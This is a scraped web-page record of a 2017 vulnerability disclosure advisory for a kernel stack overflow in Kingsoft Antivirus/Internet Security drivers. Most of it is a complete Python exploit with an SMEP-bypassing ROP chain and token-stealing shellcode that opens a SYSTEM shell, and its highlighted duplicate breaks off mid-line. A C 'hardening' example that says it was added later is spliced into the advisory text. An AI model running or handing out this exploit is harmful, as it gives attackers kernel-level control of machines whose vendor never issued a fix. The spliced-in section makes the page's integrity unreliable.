{"id":10951,"date":"2017-12-26T14:19:25","date_gmt":"2017-12-26T22:19:25","guid":{"rendered":"http:\/\/www.palada.net\/index.php\/2017\/12\/26\/news-4723\/"},"modified":"2017-12-26T14:19:25","modified_gmt":"2017-12-26T22:19:25","slug":"news-4723","status":"publish","type":"post","link":"http:\/\/www.palada.net\/index.php\/2017\/12\/26\/news-4723\/","title":{"rendered":"SSD Advisory \u2013 Kingsoft Antivirus\/Internet Security 9+ Privilege Escalation"},"content":{"rendered":"<p><strong>Credit to Author: SSD \/ Maor Schwartz | Date: Tue, 26 Dec 2017 10:03:53 +0000<\/strong><\/p>\n<div class=\"entry-content\">\n<p><strong>Want to get paid for a vulnerability similar to this one?<\/strong><br \/>Contact us at: <a href=\"mailto:ssd@beyondsecurity.com\">ssd@beyondsecurity.com<\/a><br \/> See our full scope at: <a href=\"https:\/\/blogs.securiteam.com\/index.php\/product_scope\">https:\/\/blogs.securiteam.com\/index.php\/product_scope<\/a><\/p>\n<div class=\"pf-content\">\n<p><strong>Vulnerability Summary<\/strong><br \/> The following advisory describes a kernel stack buffer overflow that leads to privilege escalation found in Kingsoft Antivirus\/Internet Security 9+.<\/p>\n<p>Kingsoft Antivirus &#8220;provides effective and efficient protection solution at no cost to users. It applies cloud security technology to monitor, scan and protect your systems without any worrying. The comprehensive defender and anti-virus tools prevent and protect your computer from unwanted virus, worms, and Trojans. 
With the simplest and easiest-to-use functions, users find themselves no difficulty to handle Kingsoft Antivirus.&#8221;<\/p>\n<p><strong>Credit<\/strong><br \/> An independent security researcher, Steven Seeley, has reported this vulnerability to Beyond Security\u2019s SecuriTeam Secure Disclosure program.<\/p>\n<p><strong>Vendor response<\/strong><br \/> We have tried to contact Kingsoft since October 8, 2017; repeated attempts to establish contact went unanswered. At this time there is no solution or workaround for this vulnerability.<br \/> <span id=\"more-3597\"><\/span><br \/> <strong>Vulnerability details<\/strong><br \/> This vulnerability allows local attackers to escalate privileges on vulnerable installations of Kingsoft Antivirus and Kingsoft Internet Security.<\/p>\n<p>The specific flaw exists within the processing of IOCTL 0x80030004 or 0x80030008 by the kavfm.sys (Antivirus) or KWatch3.sys (Internet Security) kernel driver.<\/p>\n<p>The driver does not validate the length of user-supplied data before copying it into a fixed-size stack buffer, which results in a kernel stack buffer overflow.
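<\/p>
<p>What the listing shows is a caller-controlled length passed to strncpy for a fixed 0x40-byte stack buffer, followed by a NUL store at buffer[length]. For a METHOD_BUFFERED control code such as 0x80030004 that length is the InputBufferLength the caller chose, so the check has to live in the handler, before the copy. The C below is an added example written for this page, not code from the advisory or from the Kingsoft drivers; it models the case 0 handler under hypothetical names (handle_case0_hardened, vuln_overflow_bytes, run_hardened_with_len) with a constructed 0x41-filled input, computes how far the two unchecked writes reach for a given length instead of performing them, and puts the length check beside them. The check is strictly less than the buffer size: a length equal to 0x40 already puts the terminator one byte past the end.<\/p>
<pre>
```c
/* Added example for this page (not the advisory's or the vendor's code).
   Models the IOCTL case 0 handler from the listing: a fixed 0x40-byte
   stack buffer (var_40) receives strncpy(buf, user_buf, user_len) and then
   buf[user_len] = 0, with user_len taken straight from the request.
   All names here are hypothetical. */

enum { STACK_BUF_SIZE = 0x40 };          /* size of var_40 in the listing */
enum { STATUS_INVALID_PARAMETER = -1 };  /* stand-in for the NTSTATUS code */

/* The two unchecked writes in the vulnerable path are
       strncpy(buf, user_buf, user_len);   -- up to user_len bytes
       buf[user_len] = 0;                  -- one more byte, at index user_len
   Rather than perform them (undefined behaviour once user_len reaches the
   buffer size), report how many bytes past the end of buf they reach. */
unsigned long vuln_overflow_bytes(unsigned long user_len)
{
    unsigned long bytes_touched = user_len + 1;   /* copy plus terminator */
    if (bytes_touched <= STACK_BUF_SIZE)
        return 0;
    return bytes_touched - STACK_BUF_SIZE;
}

/* Hardened handler: validate the caller-supplied length against the
   destination before any write. Strict less-than, because the terminator
   occupies one slot. Returns the number of bytes copied, or
   STATUS_INVALID_PARAMETER. */
int handle_case0_hardened(const unsigned char *user_buf, unsigned long user_len)
{
    unsigned char stack_buf[STACK_BUF_SIZE];
    unsigned long i;

    if (user_buf == 0 || user_len >= STACK_BUF_SIZE)
        return STATUS_INVALID_PARAMETER;

    /* strncpy semantics: stop early at a NUL in the source */
    for (i = 0; i < user_len && user_buf[i] != 0; i++)
        stack_buf[i] = user_buf[i];
    stack_buf[i] = 0;                /* always in bounds: i < STACK_BUF_SIZE */

    /* the real driver hands stack_buf to sub_167B0 at this point */
    return (int)i;
}

/* Constructed input: a block filled with 0x41, the same fill the PoC uses,
   handed to the hardened handler with a caller-chosen length. */
int run_hardened_with_len(unsigned long user_len)
{
    unsigned char in[0x100];
    unsigned long i;

    for (i = 0; i < sizeof in; i++)
        in[i] = 0x41;
    if (user_len > sizeof in)
        user_len = sizeof in;
    return handle_case0_hardened(in, user_len);
}
```
<\/pre>
<p>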
<\/p>\n<p>An attacker can leverage this vulnerability to execute arbitrary code in the context of the kernel.<\/p>\n<pre><code>; jumptable 000117C1 case 0\n.text:000117C8 loc_117C8:                                      ; CODE XREF: sub_11790+31\n.text:000117C8\n.text:000117C8                 push    ebx                     ; our input buffer size\n.text:000117C9                 lea     ecx, [esp+58h+var_40]   ; this is a fixed size stack buffer of 0x40\n.text:000117CD                 push    edi                     ; our input buffer\n.text:000117CE                 push    ecx                     ; char *\n.text:000117CF                 call    strncpy                 ; stack buffer overflow\n.text:000117D4                 add     esp, 0Ch\n.text:000117D7                 lea     edx, [esp+54h+var_40]\n.text:000117DB                 push    edx                     ; char *\n.text:000117DC                 mov     [esp+ebx+58h+var_40], 0\n.text:000117E1                 call    sub_167B0\n.text:000117E6                 pop     edi\n.text:000117E7                 mov     esi, eax\n.text:000117E9                 pop     esi\n.text:000117EA                 pop     ebp\n.text:000117EB                 pop     ebx\n.text:000117EC                 add     esp, 44h\n.text:000117EF                 retn    8<\/code><\/pre>\n<p><strong>Proof of Concept<\/strong><\/p>\n
<div id=\"crayon-5a42caec3600a215264132\" class=\"crayon-syntax crayon-theme-classic crayon-font-monaco crayon-os-pc print-yes notranslate\" data-settings=\" minimize scroll-mouseover\" style=\" margin-top: 12px; margin-bottom: 12px; font-size: 12px !important; line-height: 15px !important;\">\n
<div class=\"crayon-plain-wrap\"><textarea wrap=\"soft\" class=\"crayon-plain print-no\" data-settings=\"dblclick\" readonly style=\"-moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4; font-size: 12px !important; line-height: 15px !important;\">import sys\nfrom ctypes import *\nfrom time import sleep\nfrom ctypes.wintypes import *\nimport struct\nimport os\nfrom random import choice\n\nkernel32 = windll.kernel32\nntdll = windll.ntdll\n\nMEM_COMMIT = 0x00001000\nMEM_RESERVE = 0x00002000\nPAGE_EXECUTE_READWRITE = 0x00000040\nSTATUS_SUCCESS = 0\n\ndef get_ioctl():\n    return choice([0x80030004, 0x80030008])\n\ndef alloc_shellcode(base, input_size):\n    \"\"\"\n    allocates some shellcode\n    \"\"\"\n    print \"(+) allocating shellcode @ 0x%x\" % base\n    baseadd = c_int(base)\n    size    = c_int(input_size)\n\n    # --[ setup]\n    input  = struct.pack(\"&lt;I\", 0x000506f8)      # bypass smep\n\n    # --[ setup]\n    input += \"\\x60\"                             # pushad\n    input += \"\\x64\\xa1\\x24\\x01\\x00\\x00\"         # mov eax, fs:[KTHREAD_OFFSET]\n\n    # I have to do it like this because windows is a little special\n    # this just gets the EPROCESS. Windows 7 is 0x50, now its 0x80.\n    input += \"\\x8d\\x40\\x70\"                     # lea eax, [eax+0x70];\n    input += \"\\x8b\\x40\\x10\"                     # mov eax, [eax+0x10];\n    input += \"\\x89\\xc1\"                         # mov ecx, eax (Current _EPROCESS structure)\n\n    # win 10 rs2 x86 TOKEN_OFFSET = 0xfc\n    # win 07 sp1 x86 TOKEN_OFFSET = 0xf8\n    input += \"\\x8B\\x98\\xfc\\x00\\x00\\x00\"         # mov ebx, [eax + TOKEN_OFFSET]\n\n    # --[ copy system PID token]\n    input += \"\\xba\\x04\\x00\\x00\\x00\"             # mov edx, 4 (SYSTEM PID)\n    input += \"\\x8b\\x80\\xb8\\x00\\x00\\x00\"         # mov eax, [eax + FLINK_OFFSET] &lt;-|\n    input += \"\\x2d\\xb8\\x00\\x00\\x00\"             # sub eax, FLINK_OFFSET           |\n    input += \"\\x39\\x90\\xb4\\x00\\x00\\x00\"         # cmp [eax + PID_OFFSET], edx     |\n    input += \"\\x75\\xed\"                         # jnz                           -&gt;|\n\n    # win 10 rs2 x86 TOKEN_OFFSET = 0xfc\n    # win 07 sp1 x86 TOKEN_OFFSET = 0xf8\n    input += \"\\x8b\\x90\\xfc\\x00\\x00\\x00\"         # mov edx, [eax + TOKEN_OFFSET]\n    input += \"\\x89\\x91\\xfc\\x00\\x00\\x00\"         # mov [ecx + TOKEN_OFFSET], edx\n\n    # --[ recover]\n    input += \"\\x61\"                             # popad\n    input += \"\\x83\\xc4\\x0c\"                     # adjust the stack by 0xc\n    input += \"\\x31\\xc0\"                         # return NTSTATUS = STATUS_SUCCESS\n    input += \"\\xc3\"                             # ret\n\n    # filler\n    input += \"\\x43\" * (input_size-len(input))\n    ntdll.NtAllocateVirtualMemory.argtypes = [c_int, POINTER(c_int), c_ulong,\n                                              POINTER(c_int), c_int, c_int]\n    dwStatus = ntdll.NtAllocateVirtualMemory(0xffffffff, byref(baseadd), 0x0,\n                                             byref(size),\n                                             MEM_RESERVE|MEM_COMMIT,\n                                             PAGE_EXECUTE_READWRITE)\n    if dwStatus != STATUS_SUCCESS:\n        print \"(-) Error while allocating memory: %s\" % hex(dwStatus + 0xffffffff)\n        return False\n    written = c_ulong()\n    write = kernel32.WriteProcessMemory(0xffffffff, base, input, len(input), byref(written))\n    if write == 0:\n        print \"(-) Error while writing our input buffer memory: %s\" % write\n        return False\n    return True\n\ndef alloc(base, input_size, ip):\n    baseadd   = c_int(base)\n    size = c_int(input_size)\n    input = \"\\x44\" * 0x40                       # offset to ip\n\n    # start our rop chain\n    input += struct.pack(\"&lt;I\", nt + 0x51976f)   # pop ecx; ret\n    input += struct.pack(\"&lt;I\", 0x75757575)      # junk\n    input += struct.pack(\"&lt;I\", 0x76767676)      # junk\n    input += struct.pack(\"&lt;I\", ip)              # load 0x506f8\n    input += struct.pack(\"&lt;I\", nt + 0x04664f)   # mov eax, [ecx]; ret\n    input += struct.pack(\"&lt;I\", nt + 0x22f2da)   # mov cr4,eax; ret\n    input += struct.pack(\"&lt;I\", ip + 0x4)        # &amp;shellcode\n\n    # filler\n    input += \"\\x43\" * (input_size-len(input))\n\n    ntdll.NtAllocateVirtualMemory.argtypes = [c_int, POINTER(c_int), c_ulong,\n                                              POINTER(c_int), c_int, c_int]\n    dwStatus = ntdll.NtAllocateVirtualMemory(0xffffffff, byref(baseadd), 0x0,\n                                             byref(size),\n                                             MEM_RESERVE|MEM_COMMIT,\n                                             PAGE_EXECUTE_READWRITE)\n    if dwStatus != STATUS_SUCCESS:\n        print \"(-) error while allocating memory: %s\" % hex(dwStatus + 0xffffffff)\n        sys.exit()\n    written = c_ulong()\n    write = kernel32.WriteProcessMemory(0xffffffff, base, input, len(input), byref(written))\n    if write == 0:\n        print \"(-) error while writing our input buffer memory: %s\" % write\n        sys.exit()\n\ndef we_can_trigger_overflow():\n    GENERIC_READ  = 0x80000000\n    GENERIC_WRITE = 0x40000000\n    OPEN_EXISTING = 0x3\n    IOCTL_VULN    = get_ioctl()\n    DEVICE_NAME   = \"\\\\\\\\.\\\\KWatch3\"\n    dwReturn      = c_ulong()\n    driver_handle = kernel32.CreateFileA(DEVICE_NAME, GENERIC_READ | GENERIC_WRITE, 0, None, OPEN_EXISTING, 0, None)\n    ip            = 0x24242424\n\n    inputbuffer   = 0x41414141\n    inputbuffer_size = 0x60\n    outputbuffer_size = 0x1000\n    outputbuffer      = 0x20000000\n\n    alloc(inputbuffer, inputbuffer_size, ip)\n    alloc_shellcode(ip, 0x100)\n    alloc(outputbuffer, 0x100, ip)\n\n    IoStatusBlock = c_ulong()\n    if driver_handle:\n        print \"(+) sending stack overflow...\"\n        dev_ioctl = ntdll.ZwDeviceIoControlFile(driver_handle,\n                                       None,\n                                       None,\n                                       None,\n                                       byref(IoStatusBlock),\n                                       IOCTL_VULN,\n                                       inputbuffer,\n                                       inputbuffer_size,\n                                       outputbuffer,\n                                       outputbuffer_size\n                                       )\n        return True\n    return False\n\ndef we_can_leak_the_base():\n    \"\"\"\n    Get kernel base address.\n\n    This function uses psapi!EnumDeviceDrivers which is only callable\n    from a non-restricted caller (medium integrity or higher). Also the\n    assumption is made that the kernel is the first array element returned.\n    \"\"\"\n    global nt\n    print \"(+) enumerating kernel base address...\"\n\n    array = c_ulonglong * 1024\n    lpImageBase = array()\n    szDriver    = array()\n    cb = sizeof(lpImageBase)\n    lpcbNeeded = c_long()\n\n    res = windll.psapi.EnumDeviceDrivers(byref(lpImageBase),\n                                         sizeof(lpImageBase),\n                                         byref(lpcbNeeded))\n    if not res:\n        print \"(-) unable to get kernel base: \" + FormatError()\n        sys.exit(-1)\n\n    # nt is the first one\n    nt = lpImageBase[0] &amp; 0x00000000ffffffff\n    return True\n\ndef main():\n    print \"\\n\\t--[ Kingsoft Internet Security Kernel Stack Overflow EoP Exploit ]\"\n    print \"\\t               Steven Seeley (mr_me) of Source Incite\\r\\n\"\n    if we_can_leak_the_base():\n        print \"(+) found nt base at 0x%08x\" % (nt)\n        if we_can_trigger_overflow():\n            os.system(\"cmd.exe\")\n    else:\n        print \"(-) it appears that kingsoft Internet Security is not installed!\"\n\nif __name__ == '__main__':\n    main()<\/textarea><\/div>\n
<div class=\"crayon-main\" style=\"\">\n<table class=\"crayon-table\">\n<tr class=\"crayon-row\">\n<td class=\"crayon-code\">\n<div class=\"crayon-pre\" style=\"font-size: 12px !important; line-height: 15px !important; -moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4;\">\n<div class=\"crayon-line 
crayon-striped-line\" id=\"crayon-5a42caec3600a215264132-12\"><span class=\"crayon-v\">MEM_COMMIT<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0x00001000<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a42caec3600a215264132-13\"><span class=\"crayon-v\">MEM_RESERVE<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0x00002000<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a42caec3600a215264132-14\"><span class=\"crayon-v\">PAGE_EXECUTE_READWRITE<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0x00000040<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a42caec3600a215264132-15\"><span class=\"crayon-v\">STATUS_SUCCESS<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a42caec3600a215264132-16\">&nbsp;<\/div>\n<div class=\"crayon-line\" id=\"crayon-5a42caec3600a215264132-17\"><span class=\"crayon-e\">def <\/span><span class=\"crayon-e\">get_ioctl<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-o\">:<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a42caec3600a215264132-18\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-st\">return<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">choice<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-sy\">[<\/span><span class=\"crayon-cn\">0x80030004<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0x80030008<\/span><span class=\"crayon-sy\">]<\/span><span 
class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a42caec3600a215264132-19\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a42caec3600a215264132-20\"><span class=\"crayon-e\">def <\/span><span class=\"crayon-e\">alloc_shellcode<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">base<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">input_size<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-o\">:<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a42caec3600a215264132-21\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-s\">&quot;&quot;&quot;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a42caec3600a215264132-22\"><span class=\"crayon-s\">&nbsp;&nbsp;&nbsp;&nbsp;allocates some shellcode<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a42caec3600a215264132-23\"><span class=\"crayon-s\">&nbsp;&nbsp;&nbsp;&nbsp;&quot;&quot;&quot;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a42caec3600a215264132-24\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-i\">print<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&quot;(+) allocating shellcode @ 0x%x&quot;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">%<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">base<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a42caec3600a215264132-25\"><span class=\"crayon-e\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">baseadd<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">c_int<\/span><span class=\"crayon-sy\">(<\/span><span 
class=\"crayon-v\">base<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a42caec3600a215264132-26\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">size<\/span><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">c_int<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">input_size<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a42caec3600a215264132-27\">&nbsp;<\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a42caec3600a215264132-28\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-p\"># --[ setup]<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a42caec3600a215264132-29\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">input<\/span><span class=\"crayon-h\">&nbsp;&nbsp;<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-t\">struct<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">pack<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&quot;&lt;I&quot;<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0x000506f8<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-p\"># bypass smep<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a42caec3600a215264132-30\">&nbsp;<\/div>\n<div class=\"crayon-line\" id=\"crayon-5a42caec3600a215264132-31\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-p\"># --[ setup]<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a42caec3600a215264132-32\"><span 
class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">input<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">+=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&quot;\\x60&quot;<\/span><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; <\/span><span class=\"crayon-p\"># pushad<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a42caec3600a215264132-33\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">input<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">+=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&quot;\\x64\\xa1\\x24\\x01\\x00\\x00&quot;<\/span><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; <\/span><span class=\"crayon-p\"># mov eax, fs:[KTHREAD_OFFSET]<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a42caec3600a215264132-34\">&nbsp;<\/div>\n<div class=\"crayon-line\" id=\"crayon-5a42caec3600a215264132-35\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-p\"># I have to do it like this because windows is a little special<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a42caec3600a215264132-36\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-p\"># this just gets the EPROCESS. 
Windows 7 is 0x50, now it's 0x80.<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a42caec3600a215264132-37\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">input<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">+=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&quot;\\x8d\\x40\\x70&quot;<\/span><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; <\/span><span class=\"crayon-p\"># lea eax, [eax+0x70];<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a42caec3600a215264132-38\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">input<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">+=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&quot;\\x8b\\x40\\x10&quot;<\/span><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; <\/span><span class=\"crayon-p\"># mov eax, [eax+0x10];<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a42caec3600a215264132-39\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">input<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">+=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&quot;\\x89\\xc1&quot;<\/span><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; <\/span><span class=\"crayon-p\"># mov ecx, eax (Current _EPROCESS structure)<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a42caec3600a215264132-40\">&nbsp;<\/div>\n<div class=\"crayon-line\" id=\"crayon-5a42caec3600a215264132-41\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-p\"># win 10 rs2 x86 
TOKEN_OFFSET = 0xfc<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a42caec3600a215264132-42\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-p\"># win 07 sp1 x86 TOKEN_OFFSET = 0xf8<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a42caec3600a215264132-43\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">input<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">+=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&quot;\\x8B\\x98\\xfc\\x00\\x00\\x00&quot;<\/span><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; <\/span><span class=\"crayon-p\"># mov ebx, [eax + TOKEN_OFFSET]<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a42caec3600a215264132-44\">&nbsp;<\/div>\n<div class=\"crayon-line\" id=\"crayon-5a42caec3600a215264132-45\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-p\"># --[ copy system PID token]<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a42caec3600a215264132-46\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">input<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">+=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&quot;\\xba\\x04\\x00\\x00\\x00&quot;<\/span><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; <\/span><span class=\"crayon-p\"># mov edx, 4 (SYSTEM PID)<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a42caec3600a215264132-47\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">input<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">+=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&quot;\\x8b\\x80\\xb8\\x00\\x00\\x00&quot;<\/span><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; <\/span><span 
class=\"crayon-p\"># mov eax, [eax + FLINK_OFFSET] &lt;-|<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a42caec3600a215264132-48\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">input<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">+=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&quot;\\x2d\\xb8\\x00\\x00\\x00&quot;<\/span><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; <\/span><span class=\"crayon-p\"># sub eax, FLINK_OFFSET&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; |<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a42caec3600a215264132-49\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">input<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">+=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&quot;\\x39\\x90\\xb4\\x00\\x00\\x00&quot;<\/span><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; <\/span><span class=\"crayon-p\"># cmp [eax + PID_OFFSET], edx&nbsp;&nbsp;&nbsp;&nbsp; |<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a42caec3600a215264132-50\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">input<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">+=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&quot;\\x75\\xed&quot;<\/span><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; <\/span><span class=\"crayon-p\"># 